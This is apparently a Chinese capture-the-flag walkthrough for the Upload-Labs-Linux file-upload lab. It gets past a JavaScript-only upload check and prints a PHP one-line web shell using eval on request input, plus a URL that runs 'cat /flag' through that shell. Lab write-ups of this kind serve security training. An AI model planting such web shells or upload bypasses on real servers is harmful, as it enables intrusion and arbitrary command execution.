Upload-Labs-Linux

靶场教程

1.访问页面,文件上传靶场。

2.编写一句话木马上传。另存为【PHP】文件

复制代码
<?php eval($_POST['upfile']); ?>   需要POST请求访问
修改为
<?php eval($_REQUEST['upfile']); ?>   可以在url直接访问

3.发现报错,不允许上传.php文件。

4.查看源码,禁用JavaScript ,并删除该内容。

注:禁用 JavaScript 可使用插件

5.文件上传成功,访问路径。

6.获取 flag , 修改后的一句话木马,可直接访问以下 url 获取 flag

复制代码
http://e24d2149-d2bd-41e0-8d4a-697f1cfb6a9e.node5.buuoj.cn:81/upload/upfile.php?upfile=system("cat /flag");

flag{17cbbe6d-8422-44a3-a2db-17d3eee8d502} 
相关推荐
余人于RenYu5 小时前
Claude + Figma MCP
前端·ui·ai·figma
杨艺韬8 小时前
vite内核解析-第2章 架构总览
前端·vite
运维有小邓@8 小时前
什么是重放攻击?如何避免成为受害者?
运维·网络·安全
我是伪码农8 小时前
外卖餐具智能推荐
linux·服务器·前端
2401_885885048 小时前
营销推广短信接口集成:结合营销策略实现的API接口动态变量填充方案
前端·python
小李子呢02119 小时前
前端八股性能优化(2)---回流(重排)和重绘
前端·javascript
夜珀9 小时前
AtomGit组织、权限与安全完全指南
安全
程序员buddha9 小时前
深入理解ES6 Promise
前端·ecmascript·es6
吴声子夜歌9 小时前
ES6——Module详解
前端·ecmascript·es6
剪刀石头布啊10 小时前
原生form发起表单干了啥
前端